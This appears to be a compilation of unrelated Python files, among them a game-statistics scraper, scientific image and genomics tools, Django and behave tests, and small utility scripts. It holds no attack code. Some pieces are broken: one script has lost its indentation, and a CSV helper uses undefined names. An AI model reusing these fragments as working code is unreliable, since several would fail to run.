        average_damage = average_damage.strip()[3::]
        overall_spotting_damage = __parsed_data[6].split()[2].replace('разведданным', '')
        overall_spotting_damage = float(overall_spotting_damage) if overall_spotting_damage else 0.0
        __kills_info_dirty = page_parser.find('div', {'id': 'profile_main_cont'}).find('div', {'class': 'game_stats2'})
        __average_kills_info_dirty = __kills_info_dirty.find('div', {'class': 'list_pad'}).find_all('div')
        __clean_average_kills_info = self.__clean_html(str(__average_kills_info_dirty[2]))
        average_kills = __clean_average_kills_info.split()[-1][3::]
        average_kills = float(average_kills) if average_kills else 0.0
        winrate = str(page_parser.find("span", {"class": "yellow"}))
        winrate = self.__clean_html(winrate)
        levels_data = page_parser.find('div', {'class': 'game_stats3'})
        if levels_data:
            __level_data_dirty = list(levels_data.find('div', {'class': 'diag_pad'}).children)
            __levels_data_dirty_tags: List[Tag] = [item for item in __level_data_dirty if item != '\n']
            levels = self.__extract_battles_per_level(__levels_data_dirty_tags)
            average_level = self.__calculate_level_sum(levels) / battles_played if battles_played else None
        else:
            average_level = None
        return PlayerStatistics(**{'winrate': float(winrate[:-1]), 'battles': battles_played,
                                   'damage': float(average_damage), 'clantag': battalion_tag,
                                   'battalion_full': battalion_full_name,
                                   'average_spotting': overall_spotting_damage / battles_played if battles_played else 0.0,
                                   'average_kills': average_kills,
                                   'average_level': average_level,
                                   'nickname': nickname})

    def __parse_battalion_page_for_nicknames(self, page: str) -> List[Dict]:
        """Extract battalion members from a battalion page.

        :param page: decoded HTML (or the redirect JSON the site returns when
            the battalion does not exist).
        :return: list of dicts with keys 'id', 'nickname' and 'role'.
        :raises BattalionNotFound, NotAuthException
        """
        soup = BeautifulSoup(page, 'html.parser')
        # So, if battalion with given id does not exist
        # then instead of HTML page we will receive JSON, telling browser to redirect on battalion rating page
        if page == r'{"redirect":"\/alliance\/top"}':
            logger.warning('Battalion with given ID was not found')
            raise BattalionNotFound("Battalion with given ID was not found")
        # Get page "notifications" and look for error messages
        notifications = list(soup.find_all('p'))
        if not notifications:
            notifications = soup.find_all('div')
            notifications = list(notifications)
        # Check if we authenticated (if not, then notifications[1] will be equal to __NOT_AUTH_CHECK_BATTALION )
        if self.__NOT_AUTH_CHECK_BATTALION == str(notifications[1]):
            logger.error('Error on parsing page: Client is not authenticated')
            raise NotAuthException('I am not authenticated on aw.mail.ru')
        # Get all divs with cont class( Cont class is class for player information)
        data = soup.find_all('div', {'class': 'cont'})
        # This is the list where we gonna keep track of players
        battalion_players = []
        # SO, in here we are iterating over sub-tags in <div class='cont'>
        for item in str(data[0]).split('\n'):
            # Item will be something like this:
            # <div><a href="/user/stats?data=458829630">T57Heavy-Tank</a><br/><span>Рядовой</span></div>
            # if item is a player line
            if item.startswith('<div><a href="/user/stats'):
                # Here we are getting rid of all HTML stuff like tags, hrefs, etc by replacing them with space-symbols
                # We will get something like this:
                # 485633946 RUBIN ><span>Командир</span></div>
                # Then we will have something like this: ['', '485633946', 'RUBIN', '><span>Командир</span></div>']
                # Only thing we need from that is ID and nickname, so lets extract them below
                _, player_id, nickname, battalion_role = \
                    item.replace('<div><a href="/user/stats?', '').replace('">', ' ').replace('</a><br/', ' ') \
                        .replace('data=', ' ').split(' ')
                # Clean tags in battalion_role
                battalion_role = battalion_role.replace('><span>', '').replace('</span></div>', '')
                # Create a dictionary with player ID and player nickname and add this to List of all players
                player = {'id': int(player_id), 'nickname': nickname, 'role': battalion_role}
                battalion_players.append(player)
        # Eventually, return all battalion players
        return battalion_players

    def get_battalion_players(self, battalion_id: int) -> List[BattalionMemberEntry]:
        """
        Retrieves battalion players by given battalion ID
        :param battalion_id: ID of battalion
        :return: list of players in this battalion
        """
        # TODO: Optimize that algorithm, so we would need to iterate over list two times here and in page parser method
        page = self.__get_page(f'{self.__battalion_stats_url}&data={battalion_id}')
        __temp_battalion_players = self.__parse_battalion_page_for_nicknames(page)
        battalion_players: List[BattalionMemberEntry] = []
        for internal_dict_entry in __temp_battalion_players:
            battalion_players.append(
                BattalionMemberEntry(nickname=internal_dict_entry['nickname'],
                                     id=internal_dict_entry['id'],
                                     role=internal_dict_entry['role'],
                                     battalion_id=battalion_id)
            )
        return battalion_players

    def get_statistic_by_nickname(self, nickname, mode: Union[int, GameMode] = 0, player_id: int = 0, tank_id: int = 0,
                                  day: int = 0) -> PlayerStatistics:
        """
        Retrieves player statistics in mode on specified tank by given nickname or playerID
        :raises :exc:`UserHasClosedStatisticsException`, :exc:`NotAuthException`,:exc:`UserNotFoundException`
        :param nickname: Nickname of user to find
        :param mode: Game mode Number from 0 to 4 {pvp, pve, low, glops, ranked}
        :param player_id: CSA ID of player to find(overwrites user nickname if not 0)
        :param tank_id: staticID of tank to find for(0 means overall stat for mode)
        :param day: Filter stats by some date/battle count
        :return: :class:`PlayerStatistics`
        """
        # If GameMode instance was passed as a mode, than assign number from GameMode.value to mode variable
        if isinstance(mode, GameMode):
            mode = mode.value
        # Get page
        page = self.__get_player_statistic_page(nickname, mode, player_id, tank_id, day)
        # Parse the page
        parsed_data = self.__get_player_statistics(page, nickname)
        return parsed_data

    def search_battalion(self, battalion_name: str) -> List[BattalionSearchResultEntry]:
        """
        Searches for battalion by given name
        :raises :exc:`BattalionSearchTooShortQuery` if you gave less than 4 symbols for search
        :raises :exc:`BattalionSearchBattalionNotFound` if battalion with given name was not found
        versionadded:: 1.1
        :param battalion_name:
        :return: :class:`List[BattalionSearchResultEntry]`
            List of BattalionSearchResultEntry dataclass instances
        """
        import json
        r = self.__session.post('https://armata.my.games/dynamic/gamecenter/?a=clan_search',
                                data={'name': battalion_name})
        if r.status_code == 200:
            __dirty_content = json.loads(r.content.decode('utf-8'))
            if __dirty_content['error'] == 0:
                __battalions_search_result_data = __dirty_content['data']
                search_result = []
                for key in __battalions_search_result_data.keys():
                    search_result.append(BattalionSearchResultEntry(__battalions_search_result_data[key], int(key)))
                return search_result
            if __dirty_content['error'] == 1:
                raise BattalionSearchTooShortQuery(
                    f'Given battalion name is too short for process.'
                    f' 4 symbols required, {len(battalion_name)} were given',
                    len(battalion_name))
            if __dirty_content['error'] == 2:
                raise BattalionSearchBattalionNotFound(f'Battalion with name "{battalion_name}"'
                                                      f' was not found.', battalion_name)
        raise BadHTTPStatusCode(f'Received not 200 status code', r.status_code)
AW = API
|
#### This code searches over subsets of streams and locations simultaneously
#### The search happens centered on every tract in the city, with a radius (defined below) of .01
#### Ideas for exploratory data analysis:
#### 1. Tweak this radius
#### 2. Leave out 50% of data (create a training dataset and a testing dataset), run this on
#### the training data set and see whether any of the correlations you find are still significant
#### for the test data set.
RADIUS = .01
from ccss import *
from ccss import greedy_search as search
print "precalculating centers of all tracts (this may take a little while)"
with mytimer:
tract_centers = calculate_tract_centers(input)
print "completed in %d seconds"%mytimer.elapsed
f = open(opts.output,"w")
out = csv.writer(f)
out.writerow("predict tract R Dopt Sopt Xn Yn elapsed".split())
n_tracts = len(np.unique(input['tract'])) * 1.0
for i, tract in enumerate(np.unique(input['tract'])):
data = input[match_tracts(input, nearby_tracts(tract_centers[tract],input,RADIUS))]
with mytimer:
R, Sopt, Dopt, iters = search(data, np.array(streams))
Xn = np.sum(match_streams(data,Dopt) * match_tracts(data,Sopt))
Yn = np.sum(match_streams(data,[opts.predict]) * match_tracts(data,Sopt))
print "\n\n-------------------- TRACT", tract
print "Correlation = %.05f"%R
print "for predicting", opts.predict, "with these leading indicators:", ' '.join(Dopt)
print "# of events in X:", Xn
print "# of events in Y:", Yn
if np.abs(R) > .3:
out.writerow([opts.predict, tract, R, Dopt, Sopt, Xn, Yn, mytimer.elapsed])
f.flush()
print "%d %% done", i / n_tracts
print "search complete, output written to %s"%(opts.output)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 3 15:02:25 2013
@author: team
"""
import hydro_wrapper
# Configure and run a SELFE hydrodynamic simulation via the wrapper.
# NOTE(review): all arguments below are opaque positional parameters of
# hydro_wrapper — their meanings (grid id? timestep? dates?) cannot be
# determined from this file; confirm against hydro_wrapper's documentation.
hydro_wrapper.change_param(12,9, 180, 1, 1, 1)
hydro_wrapper.change_data_time(12,12,14,2013,12,23,2013)
hydro_wrapper.timer(15600)
hydro_wrapper.runSELFE(12,10800)
|
from csv_comparison_package import Compare
from csv_comparison_package import Field
# TODO LEFT HERE
def check_for_identical_row(comparable_a: Compare, comparable_b: Compare):
    """
    Sort both data frames
    Both data frames must have the same indices
    Get indices of one data frame
    for each all the indices

    NOTE(review): this function is unfinished (see the TODO above it):
    `data_frame_1_index`, `df_1`, `df_2`, `const` and
    `data_frame_1_headers_with_index_column_removed_set` are never defined in
    this file, so calling it raises NameError. It also computes two local
    result lists and returns nothing. Left byte-identical pending completion.
    """
    comparable_a_index_name = comparable_a.index_column_name[0][
        Field.column_name.value]  # not supporting multi index
    comparable_b_index_name = comparable_b.index_column_name[0][Field.column_name.value]
    # Parallel lists of (pandas_index, index_value) pairs for rows that match cell-for-cell.
    f1_index_of_identical_row = []
    f2_index_of_identical_row = []
    for index_val in data_frame_1_index:
        identical_cells_in_the_row = True
        f1_pandas_index = df_1.loc[index_val, const.CONST_INDEX_NAME_FOR_DEFAULT_PANDAS_INDEX_COLUMN]
        f2_pandas_index = df_2.loc[index_val, const.CONST_INDEX_NAME_FOR_DEFAULT_PANDAS_INDEX_COLUMN]
        # Compare every non-index cell; one mismatch disqualifies the row.
        for header_val in data_frame_1_headers_with_index_column_removed_set:
            f1_str = df_1.loc[index_val, header_val]
            f2_str = df_2.loc[index_val, header_val]
            if f1_str != f2_str:
                identical_cells_in_the_row = False
                break
            pass
        if identical_cells_in_the_row:
            f1_index_of_identical_row.append((f1_pandas_index, index_val))
            f2_index_of_identical_row.append((f2_pandas_index, index_val))
|
#Python code to generate all anagrams of a word
def anagrams(word):
    """Return every arrangement of the letters of `word`, in the order produced
    by fixing each position's letter in turn (duplicate letters yield duplicate
    entries, exactly as the input provides them)."""
    if len(word) == 1:
        return [word]
    result = []
    for idx, letter in enumerate(word):
        remainder = word[:idx] + word[idx + 1:]
        result.extend(letter + tail for tail in anagrams(remainder))
    return result
def all_digit_perms():
    """Return all 3,628,800 permutations of the digits 0-9 as strings, sorted
    ascending (lexicographic order). Note: this is expensive — 10! entries."""
    return sorted(anagrams("0123456789"))
print all_digit_perms()[999999]
|
#-*- coding: UTF-8 -*-
from plone.directives import form
# Interface class; used to define content-type schema.
# Interface class; used to define content-type schema.
class Iormfolder(form.Schema):
    """Marker schema interface for the DB-map folder content type.

    Declares no fields of its own; presumably consumed by the
    plone.directives form machinery elsewhere — confirm.
    """
def greatest_common_divisor(m, n):
    """Return the greatest common divisor of two non-negative integers.

    BUG FIX / IMPROVEMENT: the original used `xrange`, which does not exist in
    Python 3 (NameError), and scanned every candidate divisor in O(min(m, n)).
    Euclid's algorithm below returns identical results (including
    gcd(x, 0) == x and gcd(0, 0) == 0) in O(log min(m, n)).
    """
    while n:
        m, n = n, m % n
    return m
def test_greatest_common_divisor():
    """Spot-check greatest_common_divisor on small known pairs."""
    cases = [
        (6, 9, 3),
        (9, 6, 3),
        (14, 6, 2),
        (1, 2, 1),
        (1, 1, 1),
        (1, 0, 1),
        (2, 0, 2),
    ]
    for a, b, expected in cases:
        assert greatest_common_divisor(a, b) == expected
|
"""Test the healthcheck feature."""
from asserts import assert_equal
from behave import given, then, when
from behave.runner import Context
@given("a healthy server")
def healthy_server(_context: Context) -> None:
    """Server should be healthy by default, so no step implementation needed."""
@when("a client checks the server health")
def get_health(context: Context) -> None:
    """Get health status."""
    # NOTE(review): context.get presumably issues a GET to the "health"
    # endpoint and stores the response on context — confirm in the test
    # environment setup.
    context.get("health")
@then("the server answers")
def check_health(context: Context) -> None:
    """Check the server health: a healthy server returns an empty JSON object."""
    assert_equal({}, context.response.json())
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.core import exceptions
from core import models
from uuid import uuid4
class ModelTests(TestCase):
    """Unit tests for the core models: custom user manager behaviour and
    creation/string-representation of Customer, Personnel, Branch, Food,
    Table and OnlineOrder."""

    def test_create_user_with_email_successful(self):
        """ Test creating a new user with an email is successful """
        email = 'test@gmail.com'
        password = '123456'
        user = get_user_model().objects.create_user(
            email=email,
            password=password
        )
        self.assertEqual(user.email, email)
        self.assertTrue(user.check_password(password))

    def test_new_user_email_normalized(self):
        """ Test the email for a new user is normalized (turned to lower case) """
        email = 'test@GMAIL.COM'
        password = '123456'
        user = get_user_model().objects.create_user(
            email=email,
            password=password
        )
        self.assertEqual(user.email, email.lower())

    def test_new_user_invalid_email(self):
        """ Test creating user with no email raises error """
        with self.assertRaises(ValueError):
            get_user_model().objects.create_user(
                email=None,
                password='123456'
            )

    def test_create_new_superuser(self):
        """ Test creating a new superuser """
        user = get_user_model().objects.create_superuser(
            email='test@gmail.com',
            password='123456'
        )
        self.assertTrue(user.is_superuser)
        self.assertTrue(user.is_staff)

    def test_create_customer(self):
        """ Test creating a new customer """
        user = get_user_model().objects.create_user(
            email='test@gmail.com',
            password='123456'
        )
        customer = models.Customer.objects.create(
            user=user,
            customer_id=73478643,
            gender='male',
            province='Alborz',
            city='karaj',
            street='street',
            alley='alley'
        )
        self.assertEqual(user.email,customer.user.email)

    def test_create_customer_already_exists(self):
        """ Test creating a customer that already exists (same user) raises """
        user = get_user_model().objects.create_user(
            email='test@gmail.com',
            password='123456'
        )
        customer1 = models.Customer.objects.create(
            user=user,
            customer_id=73478643,
            gender='male',
            province='Alborz',
            city='karaj',
            street='street',
            alley='alley'
        )
        # A second Customer for the same user must violate the one-to-one constraint.
        with self.assertRaises(Exception):
            customer2 = models.Customer.objects.create(
                user=user,
                customer_id=73478643,
                gender='male',
                province='Alborz',
                city='karaj',
                street='street',
                alley='alley'
            )

    def test_create_personnel(self):
        """ Test creating a new personnel """
        user = get_user_model().objects.create_user(
            email='test@gmail.com',
            password='123456'
        )
        # NOTE(review): is_staff is set but not saved before creating the
        # Personnel — confirm whether Personnel requires a staff user.
        user.is_staff = True
        personnel = models.Personnel.objects.create(
            user=user,
            personnel_code=445455,
            gender='male',
            province='Alborz',
            city='karaj',
            street='street',
            alley='alley',
            birth_date='2015-11-23',
            age=6,
            salary=10000.25
        )
        self.assertEqual(user.email, personnel.user.email)

    def test_create_personnel_already_exists(self):
        """ Test creating a personnel for a user that already has one raises """
        user = get_user_model().objects.create_user(
            email='test@gmail.com',
            password='123456'
        )
        user.is_staff = True
        personnel1 = models.Personnel.objects.create(
            user=user,
            personnel_code=445455,
            gender='male',
            province='Alborz',
            city='karaj',
            street='street',
            alley='alley',
            birth_date='2015-11-23',
            age=6,
            salary=1000.25
        )
        with self.assertRaises(Exception):
            personnel2 = models.Personnel.objects.create(
                user=user,
                personnel_code=445455,
                gender='male',
                province='Alborz',
                city='karaj',
                street='street',
                alley='alley',
                birth_date='2015-11-23',
                age=6,
                salary=1000.25
            )

    def test_branch_str(self):
        """ Test the branch string representation
            (creating a branch successfully)
        """
        branch = models.Branch.objects.create(
            province='province',
            city='city',
            street='street',
            alley='alley',
            phone='+989127777777',
            branch_code=12345678
        )
        self.assertEqual(str(branch), branch.province + '-' + branch.city)

    def test_food_str(self):
        """ Test the food string representation
            (creating a food successfully)
        """
        food = models.Food.objects.create(
            name='کباب کوبیده',
            price=30000,
            description='کباب کوبیده به همراه مخلفات',
            category='breakfasts'
        )
        self.assertEqual(food.category, 'breakfasts')
        self.assertEqual(str(food), food.name)

    def test_table_str(self):
        """ Test the table string representation
            (creating a table successfully): str(table) is its primary key
        """
        branch = models.Branch.objects.create(
            branch_code=1111,
        )
        table = models.Table.objects.create(
            is_empty=True,
            is_reserved=False,
            capacity=4,
            branch=branch
        )
        self.assertEqual(str(table), str(table.pk))

    def test_order_online_str(self):
        """ Test the online order string representation
            (adding an online order successfully): str(order) is its pay code
        """
        branch = models.Branch.objects.create(
            branch_code=1234
        )
        customer = models.Customer.objects.create(
            user=get_user_model().objects.create_user(
                email='test1@gmail.com',
                password=4141
            ),
            customer_id=1111
        )
        food = models.Food.objects.create(
            name='کباب کوبیده',
            price=10000,
            description='کباب کوبیده به همراه مخلفات'
        )
        user = get_user_model().objects.create_user(
            email='test2@gmai.com',
            password='123',
        )
        user.is_staff = True
        deliverer = models.Personnel.objects.create(
            user=user,
            personnel_code=4545,
            gender='male',
            province='Alborz',
            city='karaj',
            street='street',
            alley='alley',
            birth_date='2015-11-23',
            age=6,
            salary=10000.25
        )
        order = models.OnlineOrder.objects.create(
            customer=customer,
            branch=branch,
            food=food,
            deliverer=deliverer,
            pay_code=str(uuid4()),
            count=2
        )
        self.assertEqual(str(order), order.pay_code)
# -*- coding: utf-8 -*-
"""
Created on Fri May 3 14:21:59 2019
@author: Nelson
"""
# import libraries
import os
import cv2
import numpy as np
import sys
from math import pi
from skimage import morphology, measure
from skimage.filters import scharr
from scipy import ndimage
import math
import copy
import warnings
import utils
import json
# create function that does not require landmarks
def head_method(image):
    ''' This method calculates the length of the major axis of a fitted ellipse
    around the binary mask of the daphnia.
    input:
        image source (path, passed through to utils.import_image)
    output: dictionary with 7 values:
        output['ID'] : ID of the image
        output['perimeter'] = perimeter of binary mask
        output['area'] = area of binary mask
        output['minor'] = minor axis of fitted ellipse
        output['solidity'] = ratio of the area of the binary mask
        and the area of the convex hull
        output['full.Length'] = major axis length of the fitted ellipse
        output['image'] = image with plotted size estimate'''
    # import and resize
    img_res = utils.import_image(image)
    # define output into different variables
    img = img_res["img"]
    gray = img_res["gray"]
    scf = img_res["scf"]  # scale factor used to convert pixels to real units
    # create mask
    edges = utils.create_mask(gray)
    # create regionproperties
    props = utils.create_props(edges, gray)
    # erode mask and return new properties
    props, edges_res, label_img = utils.erode_mask(edges, props, gray)
    # plot binary image
    binary2 = utils.plt_binary(edges_res, label_img, props)
    # plot mask contour on image
    img = utils.plt_contour(binary2, img)
    # plot elipse on image
    img = utils.plt_elipse(img, props)
    # plot major axis of fitted elipse
    img = utils.plt_majaxis(img, props)
    # plot minor axis of fitted elipse
    img = utils.plt_minaxis(img, props)
    # make dictionary with resuls
    res = utils.make_res(img, props, scf, image)
    # return results
    return(res)
# define function that uses landmarks to calculate body size
# also discard background while detecting eye
def eye_method_2(image):
    ''' This method uses the eye of the daphnia as a landmark
    and calculates the distance to the base of the tail, the length of the tail,
    and the angle between the tail and the body.
    input:
        image source (path, passed through to utils.import_image)
    output: dictionary with the following values:
        output['ID'] : ID of the image
        output['eye.length'] = length from eye to base of tail
        output['perimeter'] = perimeter of binary mask
        output['area'] = area of binary mask
        output['minor'] = minor axis of fitted ellipse
        output['solidity'] = ratio of the area of the binary mask
        and the area of the convex hull
        output['full.Length'] = major axis length of the fitted ellipse
        output['tail.Length'] = the length of the tail
        output['tail.angle'] = the angle between the tail and the line between
        eye and the base of the tail
        output['image'] = image with plotted size estimate'''
    # import and resize
    img_res = utils.import_image(image)
    # define output into different variables
    img = img_res["img"]
    gray = img_res["gray"]
    scf = img_res["scf"]  # scale factor used to convert pixels to real units
    # create mask
    edges = utils.create_mask(gray)
    # create regionproperties
    props, label_img = utils.create_props(edges, gray, eyeMethod = True)
    # define uneroded binary image
    binary1 = utils.plt_binary(edges, label_img, props)
    # erode mask and return new properties
    props, edges_res, label_img = utils.erode_mask(edges, props, gray)
    # plot binary image
    binary2 = utils.plt_binary(edges_res, label_img, props)
    # get major and minor axis
    # NOTE(review): major/minor/perimeter/area/solidity below are computed but
    # never used in this function (make_res re-reads props itself) — candidates
    # for removal; left as-is here.
    major = props[0].major_axis_length
    minor = props[0].minor_axis_length
    # add perimeter of mask
    perimeter = props[0].perimeter
    # add area of mask
    area = props[0].area
    # add solidity (proportion of the pixels in shape to the pixels in the convex hull)
    solidity = props[0].solidity
    # find eye in mask
    cX, cY = utils.find_eye(binary2, img)
    # find tip of tail and length between eye and tip
    far_x, far_y, daphnia_Length_eye_tip = utils.find_tip(binary1, cX, cY)
    # find base, angle and daphnia length
    base_x, base_y, daphnia_Length, angle, contours, tail_Length = utils.find_base(binary2, far_x, far_y, cX, cY, daphnia_Length_eye_tip)
    # plot mask contour on image
    img = utils.plt_contour(binary2, img)
    # plot elipse on image
    img = utils.plt_elipse(img, props)
    # plot major axis of fitted elipse
    img = utils.plt_majaxis(img, props)
    # plot minor axis of fitted elipse
    img = utils.plt_minaxis(img, props)
    # plot tail on image
    img = utils.plt_tail(img, far_x, far_y, base_x, base_y)
    # plot daphnia Length on image (from eye to base)
    img = utils. plt_length(img, cX, cY, base_x, base_y)
    # create dictionary with results
    res = utils.make_res(
        img = img,
        props = props,
        scf = scf,
        image = image,
        eyeMethod = True,
        tail_Length = tail_Length,
        daphnia_Length = daphnia_Length,
        angle = angle
    )
    # return results
    return(res)
# if called directly show image output of all three methods
if __name__ == '__main__':
    # Run both measurement methods on the image path given on the command line
    # and display the annotated results.
    res1 = head_method(sys.argv[1])
    try:
        res3 = eye_method_2(sys.argv[1])
        cv2.imshow('eye method 2', res3['image'])
    # BUG FIX: the original bare `except:` swallowed everything, including
    # KeyboardInterrupt/SystemExit; catch Exception instead. (utils' exact
    # failure types are not visible from here.) Also fixed the misspelled
    # user-facing message ("detetion" -> "detection").
    except Exception:
        print('Eye detection failed!')
    cv2.imshow('head method', res1['image'])
    cv2.waitKey(0)
    cv2.destroyAllWindows()
|
import numpy as np
from kipoi.data import Dataset
from kipoiseq.transforms import ReorderedOneHot
from genome_tools import genomic_interval, genomic_interval_set, bed3_iterator
from genome_tools.helpers import open_file
from pyfaidx import Fasta
from footprint_tools import bamfile
from footprint_tools.modeling import bias, prediction
class DataLoader(Dataset):
    """Kipoi dataset yielding, per BED3 interval, a one-hot encoded DNA
    sequence plus observed/expected DNase I cleavage count tracks.

    File-backed resources (FASTA, BAM, bias model) are opened lazily on
    first access so instances stay picklable for worker processes.
    """

    def __init__(self, intervals_file, fasta_file, bam_file, bias_model_file, shuffle=True):
        self.intervals_file = intervals_file
        self.fasta_file = fasta_file
        self.bam_file = bam_file
        self.bias_model_file = bias_model_file
        intervals_filehandle = open_file(intervals_file)
        self.intervals = genomic_interval_set(bed3_iterator(intervals_filehandle))
        self.seq_transform = ReorderedOneHot(alphabet="ACGT")
        # Opened lazily in __getitem__ (see class docstring).
        self.fasta_extractor = None
        self.bm = None
        self.cutcounts = None

    def __len__(self):
        return len(self.intervals)

    def __getitem__(self, idx):
        interval = self.intervals[idx]
        # BUG FIX: the original tested the non-existent attribute
        # `self.fasta`, raising AttributeError on every call; the lazily
        # initialised attribute is named `fasta_extractor`.
        if self.fasta_extractor is None:
            self.fasta_extractor = Fasta(self.fasta_file)
            self.cutcounts = bamfile(self.bam_file)
            self.bm = bias.kmer_model(self.bias_model_file)
        # Set up the footprint-tools class to predict cleavages
        pred = prediction(self.cutcounts,
                          self.fasta_extractor,
                          interval,
                          self.bm,
                          half_window_width=5,
                          smoothing_half_window_width=50,
                          smoothing_clip=0.01)
        # one hot encode DNA
        one_hot_seq = self.seq_transform(pred.seq)
        # compute the observed and expected DNase I cleavage profiles
        obs, exp, win = pred.compute()
        inputs = [one_hot_seq,
                  np.vstack([obs['+'][1:], obs['-'][:-1], exp['+'][1:], exp['-'][:-1]])]
        # BUG FIX: the original returned {"targets": outputs} where `outputs`
        # was never defined (NameError). This loader produces no labels, so
        # return an empty targets mapping. TODO(review): confirm intended
        # targets with the upstream model definition.
        return {"inputs": inputs, "targets": {}}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Play a music file with pygame, then block until the first event arrives.
import pygame
pygame.init()
# Load and start playback of the local MP3 (path relative to the CWD).
pygame.mixer.music.load('sunset.mp3')
pygame.mixer.music.play()
# NOTE(review): this waits for a single pygame event, not for the track to
# finish -- playback may be cut short depending on how the script is run.
pygame.event.wait()
# Reference snippets (translated from the original Portuguese comments):
# print('{}'.format())
# variable = int(input(''))
# variable = float(input(''))
# variable = str(input(''))
# Installing pygame:
# $ brew install mercurial
# $ brew install sdl sdl_image sdl_mixer sdl_ttf smpeg portmidi
# $ pip install hg+http://bitbucket.org/pygame/pygame
from typing import Tuple
def index_to_rowcol(index: int, width: int) -> Tuple[int, int]:
    """Translate a flat 1D index into (row, col) of a row-major 2D matrix.

    Parameters
    ----------
    index : int
        Flat index into the matrix.
    width : int
        Width (number of columns) of the target 2D matrix.

    Returns
    -------
    Tuple[int, int]
        Row / column indices for the target 2D matrix.
    """
    # BUG FIX: the original used int(index / width); true division goes
    # through float and silently loses precision for indices beyond 2**53.
    # divmod performs exact integer floor division and remainder in one step.
    row, col = divmod(index, width)
    return row, col
|
import cv2
import pysift
import numpy as np
from numpy import float32
def warpTwoImages(img2, img1, H):
    '''Warp img2 with homography H and composite img1 over it.

    The output canvas is translated so both images fit entirely; img1 is
    then pasted into its (translated) position. Returns the stitched image.
    '''
    print("=={}==".format(H))
    h1,w1 = img1.shape[:2]
    h2,w2 = img2.shape[:2]
    # Corners of both images as Nx1x2 float32 point arrays (cv2 convention).
    pts1 = float32([[0,0],[0,h1],[w1,h1],[w1,0]]).reshape(-1,1,2)
    print(pts1)
    pts2 = float32([[0,0],[0,h2],[w2,h2],[w2,0]]).reshape(-1,1,2)
    # Project img2's corners through H to find where they land.
    pts2_ = cv2.perspectiveTransform(pts2, H)
    print(pts2_)
    pts = np.concatenate((pts1, pts2_), axis=0)
    # Bounding box of all corners (padded by 0.5 px before truncation).
    [xmin, ymin] = np.int32(pts.min(axis=0).ravel() - 0.5)
    [xmax, ymax] = np.int32(pts.max(axis=0).ravel() + 0.5)
    t = [-xmin,-ymin]
    Ht = np.array([[1,0,t[0]],[0,1,t[1]],[0,0,1]]) # translate
    # Warp img2 onto the translated canvas, then overwrite img1's region.
    result = cv2.warpPerspective(img2, Ht.dot(H), (xmax-xmin, ymax-ymin))
    result[t[1]:h1+t[1],t[0]:w1+t[0]] = img1
    return result
def DoMerge(imgA, imgB, H):
    """Debug helper: project imgA's corner coordinates through H.

    NOTE(review): dead/abandoned code -- the loop below calls exit(1) on its
    first iteration, so the perspective-divide lines after it never run, and
    the only call site (in MergeImg) is commented out.
    """
    #a_lu,a_ru,a_ld,a_rd;
    a_x,a_y = imgA.shape
    b_x,b_y = imgB.shape
    # Homogeneous corner coordinates; columns are the four corners.
    shapeA = np.matrix([[0,0,1], [0,a_y,1],[a_x,0,1],[a_x,a_y,1]]).T
    shapeB = np.matrix([[0,0,1], [0,b_y,1],[b_x,0,1],[b_x,b_y,1]]).T
    H = np.matrix(H)
    #print(H)
    #print(shapeA)
    shapeA = H.dot(shapeA)
    print(shapeA.shape)
    for i in range(4):
        print(shapeA[2])
        exit(1)
        # Unreachable: intended normalisation by the homogeneous coordinate.
        shapeA[0][0][i] /= shapeA[2][0][i]
        shapeA[1][0][i] /= shapeA[2][0][i]
        shapeA[2][0][i] = 1
    #print(shapeA)
    #print(shapeB)
    #b_lu,b_ru,b_ld,b_rd;
def MergeImg(leftImg, rightImg):
    """Stitch two images into a panorama.

    Loads both images as grayscale, downscales them, finds SIFT keypoints
    (pysift), matches descriptors with Lowe's 0.75 ratio test, estimates a
    homography with RANSAC, and displays the warped composite.

    :param leftImg: path of the first (left) image
    :param rightImg: path of the second (right) image
    """
    left = cv2.imread(leftImg, 0)
    right = cv2.imread(rightImg, 0)
    # BUG FIX: the original performed the None check only AFTER calling
    # left.shape / right.shape, so a missing file crashed with
    # AttributeError before the guard could fire. Check immediately.
    if left is None or right is None:
        print("open src img failed")
        exit(1)
    rate = 0.05
    # resize src img
    l, w = left.shape
    print('first image shape [{},{}]'.format(l,w))
    left = cv2.resize(left, (int(w*rate), int(l*rate)))
    l, w = left.shape
    print('resize to [{},{}]'.format(l, w))
    l, w = right.shape
    print('second image shape [{},{}]'.format(l,w))
    right = cv2.resize(right, (int(w*rate), int(l*rate)))
    l, w = right.shape
    print('resize to [{},{}]'.format(l, w))
    # detect key points and SIFT descriptors in both images
    print('finding key points of first image...')
    left_kps, left_sifts = pysift.computeKeypointsAndDescriptors(left)
    print('finding key points of second image...')
    right_kps, right_sifts = pysift.computeKeypointsAndDescriptors(right)
    # match descriptors, keeping pairs that pass Lowe's 0.75 ratio test
    print('matching key points...')
    matcher = cv2.DescriptorMatcher_create('BruteForce')
    rawMatches = matcher.knnMatch(left_sifts, right_sifts, 2)
    matches = []
    for m in rawMatches:
        if len(m) == 2 and m[0].distance < m[1].distance * 0.75:
            matches.append((m[0].trainIdx, m[0].queryIdx))
    # estimate homography H mapping left-image points onto right-image points
    # NOTE(review): cv2.findHomography needs >= 4 matches; with fewer the
    # call fails -- acceptable for this demo script.
    ptsA = np.float32([left_kps[i].pt for (_, i) in matches])
    ptsB = np.float32([right_kps[i].pt for (i, _) in matches])
    H, statuc = cv2.findHomography(ptsA, ptsB, cv2.RANSAC, 4.0)
    result = warpTwoImages(left, right, H)
    cv2.imshow('result', result)
    cv2.waitKey(0)
# Script entry point: stitch the two sample images in the current directory.
if __name__ == "__main__":
    MergeImg('left.jpg', 'right.jpg')
#!/usr/bin/python
# Imports
# System
import os
import sys
import time
# Image/Papirus
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from papirus import Papirus
# Socket for IP Address
import socket
# Fonts
# Path to the Raspberry Pi HAT device-tree node.
# NOTE(review): defined but never used below -- candidate for removal.
hatdir = '/proc/device-tree/hat'
# TTF font file for the IP address (rebound to an ImageFont object below).
ipFont = '/usr/share/fonts/truetype/freefont/FreeMonoOblique.ttf'
if __name__=="__main__":
    # Check EPD_SIZE is defined
    EPD_SIZE=0.0
    if os.path.exists('/etc/default/epd-fuse'):
        # The config file contains Python-compatible assignments; executing
        # it sets EPD_SIZE in this scope.
        exec(open('/etc/default/epd-fuse').read())
    if EPD_SIZE==0.0:
        print("Please select your screen size by running 'papirus-config'.")
        # NOTE(review): execution continues even without a configured size;
